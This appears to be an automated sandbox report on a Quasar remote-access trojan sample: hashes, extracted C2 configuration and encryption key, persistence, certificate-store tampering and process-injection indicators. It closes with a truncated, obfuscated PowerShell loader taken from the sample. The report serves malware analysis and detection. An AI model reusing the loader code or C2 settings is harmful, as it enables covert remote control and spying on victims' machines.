quasar | 45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7

General

Target

Uni.bat
Size

515KB
MD5

4c2a3be3d5c9464eb441677e41f44fd8
SHA1

c826034a0882d21a39056d745e88622ee9698343
SHA256

45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7
SHA512

ccf12f0e439393f4fef5531ef89a62411feeaed9d7f0751e9e4c5fb366d1cd0059a11e0a12002b851ff138701f69d65ce7ad69f1bcb6e3944481311311c8f27c
SSDEEP

12288:OOCZeIh9XQFAbCbtqTUGLYPSow/QWEO2b:4zh9+3tZGEw/b2b

Score

10^/10

quasar slave execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

C2

review-tops.gl.at.ply.gg:48212

Mutex

$Sxr-IGnkORFTlshRl7BdTw

Attributes

encryption_key
YDmRBA8wExjQkYgGrHhN
install_name
$sxr-powershell.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Discord
subdirectory
$77

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral4/memory/5020-74-0x00000000053F0000-0x000000000545C000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 1904 created 608 1904 powershell.EXE winlogon.exe
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

2 5020 powershell.exe
3 5020 powershell.exe
4 5020 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2812 powershell.exe
4948 powershell.exe
5020 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

$sxr-powershell.exeinstall.exe

pid process

1004 $sxr-powershell.exe
3812 install.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

1 raw.githubusercontent.com
4 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com

description	pid	process	target process
PID 1904 created 608	1904	powershell.EXE	winlogon.exe

flow	pid	process
2	5020	powershell.exe
3	5020	powershell.exe
4	5020	powershell.exe

pid	process
1004	$sxr-powershell.exe
3812	install.exe

flow	ioc
1	raw.githubusercontent.com
4	raw.githubusercontent.com

flow	ioc
1	ip-api.com

Drops file in System32 directory 4 IoCs

Processes:

powershell.EXEsvchost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 1904 set thread context of 1172 1904 powershell.EXE dllhost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

3064 schtasks.exe

description	pid	process	target process
PID 1904 set thread context of 1172	1904	powershell.EXE	dllhost.exe

pid	process
3064	schtasks.exe

Modifies data under HKEY_USERS 41 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings	powershell.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

$sxr-powershell.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	$sxr-powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	$sxr-powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	$sxr-powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exe$sxr-powershell.exepowershell.EXEdllhost.exe

pid	process
2812	powershell.exe
2812	powershell.exe
4948	powershell.exe
4948	powershell.exe
5020	powershell.exe
5020	powershell.exe
1004	$sxr-powershell.exe
1004	$sxr-powershell.exe
1904	powershell.EXE
1904	powershell.EXE
1904	powershell.EXE
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe
1172	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeIncreaseQuotaPrivilege	4948	powershell.exe
Token: SeSecurityPrivilege	4948	powershell.exe
Token: SeTakeOwnershipPrivilege	4948	powershell.exe
Token: SeLoadDriverPrivilege	4948	powershell.exe
Token: SeSystemProfilePrivilege	4948	powershell.exe
Token: SeSystemtimePrivilege	4948	powershell.exe
Token: SeProfSingleProcessPrivilege	4948	powershell.exe
Token: SeIncBasePriorityPrivilege	4948	powershell.exe
Token: SeCreatePagefilePrivilege	4948	powershell.exe
Token: SeBackupPrivilege	4948	powershell.exe
Token: SeRestorePrivilege	4948	powershell.exe
Token: SeShutdownPrivilege	4948	powershell.exe
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeSystemEnvironmentPrivilege	4948	powershell.exe
Token: SeRemoteShutdownPrivilege	4948	powershell.exe
Token: SeUndockPrivilege	4948	powershell.exe
Token: SeManageVolumePrivilege	4948	powershell.exe
Token: 33	4948	powershell.exe
Token: 34	4948	powershell.exe
Token: 35	4948	powershell.exe
Token: 36	4948	powershell.exe
Token: SeIncreaseQuotaPrivilege	4948	powershell.exe
Token: SeSecurityPrivilege	4948	powershell.exe
Token: SeTakeOwnershipPrivilege	4948	powershell.exe
Token: SeLoadDriverPrivilege	4948	powershell.exe
Token: SeSystemProfilePrivilege	4948	powershell.exe
Token: SeSystemtimePrivilege	4948	powershell.exe
Token: SeProfSingleProcessPrivilege	4948	powershell.exe
Token: SeIncBasePriorityPrivilege	4948	powershell.exe
Token: SeCreatePagefilePrivilege	4948	powershell.exe
Token: SeBackupPrivilege	4948	powershell.exe
Token: SeRestorePrivilege	4948	powershell.exe
Token: SeShutdownPrivilege	4948	powershell.exe
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeSystemEnvironmentPrivilege	4948	powershell.exe
Token: SeRemoteShutdownPrivilege	4948	powershell.exe
Token: SeUndockPrivilege	4948	powershell.exe
Token: SeManageVolumePrivilege	4948	powershell.exe
Token: 33	4948	powershell.exe
Token: 34	4948	powershell.exe
Token: 35	4948	powershell.exe
Token: 36	4948	powershell.exe
Token: SeIncreaseQuotaPrivilege	4948	powershell.exe
Token: SeSecurityPrivilege	4948	powershell.exe
Token: SeTakeOwnershipPrivilege	4948	powershell.exe
Token: SeLoadDriverPrivilege	4948	powershell.exe
Token: SeSystemProfilePrivilege	4948	powershell.exe
Token: SeSystemtimePrivilege	4948	powershell.exe
Token: SeProfSingleProcessPrivilege	4948	powershell.exe
Token: SeIncBasePriorityPrivilege	4948	powershell.exe
Token: SeCreatePagefilePrivilege	4948	powershell.exe
Token: SeBackupPrivilege	4948	powershell.exe
Token: SeRestorePrivilege	4948	powershell.exe
Token: SeShutdownPrivilege	4948	powershell.exe
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeSystemEnvironmentPrivilege	4948	powershell.exe
Token: SeRemoteShutdownPrivilege	4948	powershell.exe
Token: SeUndockPrivilege	4948	powershell.exe
Token: SeManageVolumePrivilege	4948	powershell.exe
Token: 33	4948	powershell.exe
Token: 34	4948	powershell.exe
Token: 35	4948	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 568 wrote to memory of 412	568	cmd.exe	net.exe
PID 568 wrote to memory of 412	568	cmd.exe	net.exe
PID 412 wrote to memory of 4032	412	net.exe	net1.exe
PID 412 wrote to memory of 4032	412	net.exe	net1.exe
PID 568 wrote to memory of 2812	568	cmd.exe	powershell.exe
PID 568 wrote to memory of 2812	568	cmd.exe	powershell.exe
PID 568 wrote to memory of 2812	568	cmd.exe	powershell.exe
PID 2812 wrote to memory of 4948	2812	powershell.exe	powershell.exe
PID 2812 wrote to memory of 4948	2812	powershell.exe	powershell.exe
PID 2812 wrote to memory of 4948	2812	powershell.exe	powershell.exe
PID 2812 wrote to memory of 4716	2812	powershell.exe	WScript.exe
PID 2812 wrote to memory of 4716	2812	powershell.exe	WScript.exe
PID 2812 wrote to memory of 4716	2812	powershell.exe	WScript.exe
PID 4716 wrote to memory of 1220	4716	WScript.exe	cmd.exe
PID 4716 wrote to memory of 1220	4716	WScript.exe	cmd.exe
PID 4716 wrote to memory of 1220	4716	WScript.exe	cmd.exe
PID 1220 wrote to memory of 2412	1220	cmd.exe	net.exe
PID 1220 wrote to memory of 2412	1220	cmd.exe	net.exe
PID 1220 wrote to memory of 2412	1220	cmd.exe	net.exe
PID 2412 wrote to memory of 1520	2412	net.exe	net1.exe
PID 2412 wrote to memory of 1520	2412	net.exe	net1.exe
PID 2412 wrote to memory of 1520	2412	net.exe	net1.exe
PID 1220 wrote to memory of 5020	1220	cmd.exe	powershell.exe
PID 1220 wrote to memory of 5020	1220	cmd.exe	powershell.exe
PID 1220 wrote to memory of 5020	1220	cmd.exe	powershell.exe
PID 5020 wrote to memory of 3064	5020	powershell.exe	schtasks.exe
PID 5020 wrote to memory of 3064	5020	powershell.exe	schtasks.exe
PID 5020 wrote to memory of 3064	5020	powershell.exe	schtasks.exe
PID 5020 wrote to memory of 1004	5020	powershell.exe	$sxr-powershell.exe
PID 5020 wrote to memory of 1004	5020	powershell.exe	$sxr-powershell.exe
PID 5020 wrote to memory of 1004	5020	powershell.exe	$sxr-powershell.exe
PID 5020 wrote to memory of 3812	5020	powershell.exe	install.exe
PID 5020 wrote to memory of 3812	5020	powershell.exe	install.exe
PID 5020 wrote to memory of 3812	5020	powershell.exe	install.exe
PID 1904 wrote to memory of 1172	1904	powershell.EXE	dllhost.exe
PID 1904 wrote to memory of 1172	1904	powershell.EXE	dllhost.exe
PID 1904 wrote to memory of 1172	1904	powershell.EXE	dllhost.exe
PID 1904 wrote to memory of 1172	1904	powershell.EXE	dllhost.exe
PID 1904 wrote to memory of 1172	1904	powershell.EXE	dllhost.exe
PID 1904 wrote to memory of 1172	1904	powershell.EXE	dllhost.exe
PID 1904 wrote to memory of 1172	1904	powershell.EXE	dllhost.exe
PID 1904 wrote to memory of 1172	1904	powershell.EXE	dllhost.exe
PID 1172 wrote to memory of 608	1172	dllhost.exe	winlogon.exe
PID 1172 wrote to memory of 688	1172	dllhost.exe	lsass.exe
PID 1172 wrote to memory of 980	1172	dllhost.exe	svchost.exe
PID 1172 wrote to memory of 428	1172	dllhost.exe	dwm.exe
PID 1172 wrote to memory of 536	1172	dllhost.exe	svchost.exe
PID 1172 wrote to memory of 452	1172	dllhost.exe	svchost.exe
PID 1172 wrote to memory of 1060	1172	dllhost.exe	svchost.exe
PID 1172 wrote to memory of 1152	1172	dllhost.exe	svchost.exe
PID 1172 wrote to memory of 1164	1172	dllhost.exe	svchost.exe
PID 1172 wrote to memory of 1212	1172	dllhost.exe	svchost.exe
PID 1172 wrote to memory of 1228	1172	dllhost.exe	svchost.exe
PID 1172 wrote to memory of 1276	1172	dllhost.exe	svchost.exe
PID 1172 wrote to memory of 1400	1172	dllhost.exe	svchost.exe
PID 1172 wrote to memory of 1408	1172	dllhost.exe	svchost.exe
PID 1172 wrote to memory of 1424	1172	dllhost.exe	svchost.exe
PID 1172 wrote to memory of 1540	1172	dllhost.exe	svchost.exe
PID 1172 wrote to memory of 1560	1172	dllhost.exe	svchost.exe
PID 1172 wrote to memory of 1688	1172	dllhost.exe	svchost.exe
PID 1172 wrote to memory of 1740	1172	dllhost.exe	svchost.exe
PID 1172 wrote to memory of 1756	1172	dllhost.exe	svchost.exe
PID 1172 wrote to memory of 1852	1172	dllhost.exe	svchost.exe
PID 1172 wrote to memory of 1880	1172	dllhost.exe	svchost.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:608

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:428

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{0ba9ebc7-bbe7-4c86-bbd5-d94e6c1d1256}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1172

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:980

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:536

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:452

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1152

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:serRBHKKBDGS{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NUZQsMLMPBpUyB,[Parameter(Position=1)][Type]$BLJBSSemmB)$AIywZgAGnHK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+'Delega'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+'T'+'y'+[Char](112)+''+'e'+'',''+[Char](67)+''+'l'+'a'+[Char](115)+'s'+[Char](44)+'P'+'u'+''+'b'+'l'+'i'+'c'+','+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,'+[Char](65)+'n'+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+'A'+'u'+[Char](116)+'o'+'C'+'l'+'a'+'ss',[MulticastDelegate]);$AIywZgAGnHK.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+'m'+'e'+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$NUZQsMLMPBpUyB).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+'a'+[Char](110)+'a'+'g'+''+'e'+''+'d'+'');$AIywZgAGnHK.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+'ke','P'+'u'+''+[Char](98)+'l'+[Char](105)+''+'c'+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+'e'+'B'+[Char](121)+'Si'+[Char](103)+','+[Char](78)+'e'+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+'i'+''+[Char](114)+'tu'+[Char](97)+'l',$BLJBSSemmB,$NUZQsMLMPBpUyB).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+'i'+''+'m'+'e,'+[Char](77)+'a'+[Char](110)+'a'+[Char](103)+''+[Char](101)+'d');Write-Output $AIywZgAGnHK.CreateType();}$mGfvhHBBeXvaI=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 